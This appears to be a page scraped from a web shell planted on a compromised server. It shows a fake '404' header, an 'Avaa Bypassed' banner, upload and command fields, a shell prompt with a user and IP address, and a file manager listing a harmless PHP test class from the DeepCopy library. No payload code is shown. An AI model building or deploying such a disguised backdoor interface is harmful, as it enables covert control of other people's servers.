404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.144.12.43: ~ $
<?php declare(strict_types=1);

namespace DeepCopy\f008;

class A
{
    private $foo;

    public function __construct($foo)
    {
        $this->foo = $foo;
    }

    public function getFoo()
    {
        return $this->foo;
    }
}

Filemanager

Name Type Size Permission Actions
A.php File 253 B 0644
B.php File 87 B 0644